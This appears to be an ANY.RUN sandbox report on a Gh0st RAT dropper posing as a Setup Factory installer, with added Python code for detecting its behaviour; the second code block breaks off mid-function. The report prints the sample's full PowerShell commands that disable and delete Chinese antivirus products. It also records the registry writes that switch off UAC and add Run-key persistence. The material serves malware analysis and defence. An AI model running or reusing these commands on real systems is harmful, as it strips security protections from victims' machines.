File name: 4.exe
Full analysis: https://app.any.run/tasks/8b7096c9-49e4-42fe-b6e9-6ff8d1972560
Verdict: Malicious activity
Threats:

Gh0st RAT is a remote access trojan whose feature set lets an attacker take full control of the victim's system. Its spying capabilities have made it a go-to tool for numerous criminal groups in high-profile attacks against government and corporate organizations. The most common infection vector is spam and phishing email.

Analysis date: December 19, 2024, 08:27:58
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: remote, rat, gh0st, lua, upx
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5: 3FADBB51B25E6CDBE5602A60479D0B0E
SHA1: FBB4FF7160BC99FA88339707E2F2F66B459A3538
SHA256: B3762AFC2A606B2DEC3FA18C9F1E58F7065F2437DDE720176C6608E09E9A767D
SSDEEP: 98304:5DrpK4L00MTSMVr0Xb002l0M2s6jRzvy7KV3rt8nOBl6M8Q/kh5ANftsXJnJnuyF:WJD

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 4.exe (PID: 6544)
      • 4.exe (PID: 6636)
    • UAC/LUA settings modification

      • iusb3mon.exe (PID: 6796)
    • GH0ST has been detected (SURICATA)

      • iusb3mon.exe (PID: 6796)
    • Connects to the CnC server

      • iusb3mon.exe (PID: 6796)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 640)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7360)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
    • Changes powershell execution policy (Bypass)

      • iusb3mon.exe (PID: 6796)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 6152)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • 4.exe (PID: 6636)
      • ShellExperienceHost.exe (PID: 4244)
    • Executable content was dropped or overwritten

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)
    • Reads the date of Windows installation

      • 4.exe (PID: 6636)
    • Removes files via Powershell

      • powershell.exe (PID: 6820)
      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6948)
      • powershell.exe (PID: 6956)
      • powershell.exe (PID: 6964)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 6400)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 4076)
    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 6820)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 6400)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 4076)
      • powershell.exe (PID: 7740)
    • Manipulates environment variables

      • powershell.exe (PID: 6940)
      • powershell.exe (PID: 6948)
      • powershell.exe (PID: 6956)
      • powershell.exe (PID: 6964)
    • Starts POWERSHELL.EXE for commands execution

      • iusb3mon.exe (PID: 6796)
      • irsetup.exe (PID: 6684)
    • Base64-obfuscated command line is found

      • iusb3mon.exe (PID: 6796)
    • The process bypasses the loading of PowerShell profile settings

      • iusb3mon.exe (PID: 6796)
    • Creates file in the system drive root

      • iusb3mon.exe (PID: 6796)
      • cmd.exe (PID: 7160)
    • Contacting a server suspected of hosting a CnC

      • iusb3mon.exe (PID: 6796)
    • Suspicious use of asymmetric encryption in PowerShell

      • iusb3mon.exe (PID: 6796)
      • irsetup.exe (PID: 6684)
    • Starts CMD.EXE for commands execution

      • iusb3mon.exe (PID: 6796)
    • Renames file via Powershell

      • powershell.exe (PID: 1488)
      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 640)
      • powershell.exe (PID: 6400)
      • powershell.exe (PID: 7340)
      • powershell.exe (PID: 7360)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 4076)
      • powershell.exe (PID: 6820)
    • Connects to unusual port

      • iusb3mon.exe (PID: 6796)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6964)
    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 6964)
    • Probably obfuscated PowerShell command line is found

      • irsetup.exe (PID: 6684)
  • INFO

    • The sample compiled with English language support

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)
    • Reads the computer name

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)
      • ShellExperienceHost.exe (PID: 4244)
      • iusb3mon.exe (PID: 6796)
    • Checks supported languages

      • 4.exe (PID: 6636)
      • irsetup.exe (PID: 6684)
      • ShellExperienceHost.exe (PID: 4244)
      • iusb3mon.exe (PID: 6796)
    • Create files in a temporary directory

      • 4.exe (PID: 6636)
      • SecEdit.exe (PID: 7996)
    • Reads the machine GUID from the registry

      • iusb3mon.exe (PID: 6796)
    • Reads CPU info

      • iusb3mon.exe (PID: 6796)
    • Sends debugging messages

      • iusb3mon.exe (PID: 6796)
    • Creates files in the program directory

      • iusb3mon.exe (PID: 6796)
    • The process uses the downloaded file

      • irsetup.exe (PID: 6684)
    • Process checks computer location settings

      • irsetup.exe (PID: 6684)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3532)
      • powershell.exe (PID: 7740)
      • powershell.exe (PID: 7380)
      • powershell.exe (PID: 7752)
      • powershell.exe (PID: 4076)
    • The process uses Lua

      • irsetup.exe (PID: 6684)
    • UPX packer has been detected

      • iusb3mon.exe (PID: 6796)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.scr | Windows screen saver (76.6)
.exe | Generic Win/DOS Executable (11.7)
.exe | DOS Executable Generic (11.6)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2012:06:14 16:16:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 10
CodeSize: 25088
InitializedDataSize: 139264
UninitializedDataSize: -
EntryPoint: 0x2d1c
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
FileVersionNumber: 9.1.0.0
ProductVersionNumber: 9.1.0.0
FileFlagsMask: 0x003f
FileFlags: Private build
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
Comments: Created with Setup Factory
FileDescription: Setup Application
FileVersion: 9.1.0.0
InternalName: suf_launch
LegalCopyright: Setup Engine Copyright © 2004-2012 Indigo Rose Corporation
LegalTrademarks: Setup Factory is a trademark of Indigo Rose Corporation.
OriginalFileName: suf_launch.exe
ProductName: Setup Factory Runtime
ProductVersion: 9.1.0.0
All screenshots are available in the full report
Total processes: 178
Monitored processes: 48
Malicious processes: 9
Suspicious processes: 7

Behavior graph

Graph order: 4.exe -> irsetup.exe -> iusb3mon.exe (tagged #GH0ST, the process the Gh0st detection fired on), followed by the processes the installer and the payload spawned. The 48 monitored processes in the graph are:
  • 4.exe (2; the second instance is the re-launch at the end of the graph)
  • irsetup.exe (1)
  • iusb3mon.exe (1, #GH0ST)
  • powershell.exe (15)
  • conhost.exe (19)
  • cmd.exe (4)
  • schtasks.exe (1)
  • secedit.exe (4)
  • shellexperiencehost.exe (1)
"no specs" is the graph's marker for a process with no signature details of its own; every process after the first three carries it.

Process information

Each entry gives the PID, parent process, image path and command line (CMD), then the process details and the images (modules) loaded. No per-process indicators are recorded in this excerpt.

PID: 640
Parent process: iusb3mon.exe
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
CMD: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360safe.ini';}
Note: the DisplayName pattern is recorded as the cp1252 rendering of the script's GBK bytes; decoded, '*360°²È«ÎÀÊ¿*' is '*360安全卫士*' (360 Safeguard, a Chinese security product). The script looks the product up in the Uninstall keys, detaches its 360Box64, 360FsFlt, 360qpesv and DsArk minifilters from that volume with fltmc.exe, deletes the install directory, prefixes any surviving file with '001_', denies Everyone read/execute on the directory with icacls.exe, and writes C:\360safe.ini as a completion marker.
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 640
Parent process: powershell.exe
Path: C:\Windows\System32\conhost.exe
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1156
Parent process: powershell.exe
Path: C:\Windows\System32\conhost.exe
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1488
Parent process: iusb3mon.exe
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
CMD: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\360sd.ini';}
Note: the same routine as PID 640, this time matching '*360sd*' (360's antivirus component, whose main binary is 360sd.exe) and writing C:\360sd.ini as the marker.
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 1904
Parent process: cmd.exe
Path: C:\Windows\System32\conhost.exe
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2148
Parent process: powershell.exe
Path: C:\Windows\System32\conhost.exe
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3060
Parent process: powershell.exe
Path: C:\Windows\System32\conhost.exe
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3140
Parent process: cmd.exe
Path: C:\Windows\System32\conhost.exe
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3532
Parent process: iusb3mon.exe
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
CMD: powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
Note: '»ðÈÞ' is the cp1252 rendering of the GBK bytes for '火绒' (Huorong Security); the target directory is derived from the product's UninstallString and its sysdiag minifilter is detached. The stray '}' after the ForEach-Object block makes the whole line fail to parse, so none of it executes; this matches the "Script raised an exception (POWERSHELL)" signature listed for this PID.
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 4076
Parent process: irsetup.exe
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
Note: this instance is the 64-bit PowerShell, launched directly by the installer (irsetup.exe) rather than by the payload, and without -ExecutionPolicy Bypass or a hidden window. '½ðɽ¶¾°Ô' decodes to '金山毒霸' (Kingsoft Antivirus) and the kisknl minifilter is the one detached; the variable names are still the Huorong variant's. The same stray '}' is present, so this line also fails to parse, consistent with the exception signature for PID 4076.
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
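The PowerShell variants above share one structure: locate a Chinese security product through the Uninstall registry keys, detach its file-system minifilters with fltmc.exe, delete and ACL-deny its install directory, and drop a marker file. The block below is an added example, not code from the ANY.RUN report or from the sample; it is written in Python rather than PowerShell so it runs anywhere. It recovers the product names from the mojibake the sandbox recorded (GBK bytes shown as cp1252) and scores a process-creation command line against the indicators that separate this AV-killer from routine `-ExecutionPolicy Bypass` administration. The sample command lines are constructed abbreviations of the PID 640 and PID 3532 entries plus one benign line.

```python
"""Triage the AV-killer PowerShell one-liners recorded in this report.

Added example, not part of the ANY.RUN report or the sample. It assumes the
command lines are seen as the sandbox displayed them: the script's GBK bytes
rendered as cp1252 text, which is why the DisplayName patterns look like
'360°²È«ÎÀÊ¿' instead of the Chinese product names.
"""
import re

# Constructed input: abbreviated copies of the PID 640 and PID 3532 command
# lines from the report (registry-path lists trimmed, mojibake kept), plus
# one benign Bypass invocation that must not be flagged.
SAMPLE_CMDLINES = [
    "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
    "$ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path "
    "@('HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall') "
    "| Get-ItemProperty -Name DisplayName, InstallLocation "
    "| Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } "
    "| ForEach-Object { $_.InstallLocation };if ($360safe){"
    "fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;"
    "Remove-Item -Path $360safe -Recurse -Force;"
    "icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';"
    "Set-Content -Value 'ok' -Path 'C:\\360safe.ini';}",
    "powershell.exe -ExecutionPolicy Bypass $ErrorActionPreference='SilentlyContinue';"
    "$huorong_path = Get-ChildItem -Path "
    "@('HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall') "
    "| Where-Object { $_.DisplayName -match '»ðÈÞ' } "
    "| ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };"
    "if ($huorong_path){fltmc.exe detach sysdiag $huorong_drive;"
    "Remove-Item -Path $huorong_path -Recurse -Force;"
    "Set-Content -Value 'ok' -Path 'C:\\ok.ini';}",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\cleanup.ps1",
]

# Each indicator alone is common in admin scripting; the combination is not.
INDICATORS = {
    "bypass_policy": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "hidden_window": re.compile(r"-WindowStyle\s+Hidden", re.I),
    "filter_detach": re.compile(r"\bfltmc(?:\.exe)?\s+detach\b", re.I),
    "uninstall_enum": re.compile(r"CurrentVersion\\Uninstall", re.I),
    "recursive_delete": re.compile(r"Remove-Item\b[^;]*-Recurse\b[^;]*-Force\b", re.I),
    "acl_deny": re.compile(r"\bicacls(?:\.exe)?\s+\S+\s+/deny\b", re.I),
}


def unmangle_gbk(text: str) -> str:
    """Undo GBK-bytes-shown-as-cp1252 mojibake; leave other text unchanged."""
    try:
        return text.encode("cp1252").decode("gbk")
    except (UnicodeEncodeError, UnicodeDecodeError):
        return text


def indicator_hits(cmdline: str) -> set:
    """Names of the INDICATORS present in one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}


def is_av_killer(cmdline: str) -> bool:
    """Detaching a file-system minifilter plus two more indicators is the tell."""
    hits = indicator_hits(cmdline)
    return "filter_detach" in hits and len(hits) >= 3


def triage(cmdline: str) -> dict:
    """Extract what one line targets: product pattern, drivers, marker file."""
    pat = re.search(r"DisplayName\s+-(?:like|match)\s+'([^']*)'", cmdline, re.I)
    marker = re.search(r"Set-Content\s+-Value\s+'ok'\s+-Path\s+'([^']+)'", cmdline, re.I)
    target_raw = pat.group(1) if pat else ""
    return {
        "target_raw": target_raw,
        "target": unmangle_gbk(target_raw),
        "drivers": re.findall(r"\bfltmc(?:\.exe)?\s+detach\s+(\S+)", cmdline, re.I),
        "marker_file": marker.group(1) if marker else None,
        "indicators": sorted(indicator_hits(cmdline)),
        "av_killer": is_av_killer(cmdline),
    }


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(triage(line))
```

Feed it the CommandLine field of Sysmon event 1 or Security event 4688 records; the `filter_detach` requirement keeps ordinary `-ExecutionPolicy Bypass` scripts below the threshold, and `unmangle_gbk` returns its input untouched whenever the text is not a cp1252 view of valid GBK.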
Total events: 64 488
Read events: 64 474
Write events: 10
Delete events: 4

Modification events

irsetup.exe (PID 6684), key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
  write SlowContextMenuEntries = 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
iusb3mon.exe (PID 6796), key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  write ConsentPromptBehaviorAdmin = 0
  write EnableLUA = 0
  write PromptOnSecureDesktop = 0
ShellExperienceHost.exe (PID 4244), key \REGISTRY\A\{97ac789c-5a54-b28d-432c-5c87ef853933}\LocalState
  write PeekBadges = 5B005D00000087783AF5EF51DB01
  write PeekBadges = 5B005D0000006B203CF5EF51DB01
iusb3mon.exe (PID 6796), value name "Microsoft" = C:\ProgramData\Program\iusb3mon.exe written to three autorun keys:
  HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SecEdit.exe (PID 7996), key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
  delete value LastWinlogonConfig

The three Policies\System writes are the "UAC/LUA settings modification" signature: EnableLUA=0 switches UAC off after the next reboot, ConsentPromptBehaviorAdmin=0 lets administrators elevate without any prompt, and PromptOnSecureDesktop=0 takes any remaining prompt off the secure desktop. The Run-key writes are persistence for the dropped payload under a value name chosen to look like a Microsoft entry, in both the native and WOW6432Node machine views and in the user hive. The SlowContextMenuEntries and PeekBadges writes are shell housekeeping.
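The following block is an added example, not code from the ANY.RUN report or from the sample. It parses the text of a `reg export` (.reg) dump of the two keys tampered with above and flags both the zeroed UAC values and any autorun whose image sits in a user-writable directory such as C:\ProgramData. The .reg text is constructed from the values this report lists; real exports are UTF-16LE, so open them with `encoding="utf-16"`.

```python
"""Flag UAC tampering and suspicious autoruns in a `reg export` (.reg) dump.

Added example, not part of the ANY.RUN report or the sample it describes.
The sample .reg text below is constructed from the modification events the
report lists; a real export is UTF-16LE (open it with encoding="utf-16").
"""
import re

UAC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
RUN_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run",
    r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
)
# Windows 10 defaults: UAC on, "prompt for consent for non-Windows binaries",
# prompts shown on the secure desktop. A value of 0 disables each protection.
UAC_DEFAULTS = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5, "PromptOnSecureDesktop": 1}
# Autorun images under these roots are writable by a standard user.
USER_WRITABLE = re.compile(r'^"?[A-Za-z]:\\(?:ProgramData|Users)\\', re.I)

# Constructed sample: the values the report attributes to iusb3mon.exe (PID 6796)
# plus one legitimate autorun, in the format `reg export` produces.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000000
"EnableLUA"=dword:00000000
"PromptOnSecureDesktop"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft"="C:\\ProgramData\\Program\\iusb3mon.exe"
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"""

_VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def parse_reg(text: str) -> dict:
    """Parse .reg text into {key_path: {value_name: value}}.

    dword values become ints; REG_SZ strings are unescaped; other types
    (hex:, hex(2):, @ defaults) are kept as their raw text.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m is None or current is None:
            continue
        name, val = m.group(1), m.group(2)
        if val.startswith("dword:"):
            keys[current][name] = int(val[len("dword:"):], 16)
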